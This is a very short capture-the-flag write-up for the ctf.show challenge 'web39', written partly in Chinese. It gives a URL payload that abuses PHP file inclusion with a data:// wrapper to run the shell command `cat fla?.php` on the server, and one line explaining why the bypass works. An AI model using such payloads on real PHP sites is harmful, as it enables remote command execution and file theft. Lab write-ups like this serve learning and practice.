web39

payload

http://cc1796ea-6744-46bb-ad48-0c11d79f55a5.challenge.ctf.show/?c=data://text/plain,<?=`cat fla?.php`?>

绕过原理就是当一串PHP代码闭合后,后面的语句就会当作HTML处理,不加处理的返回给用户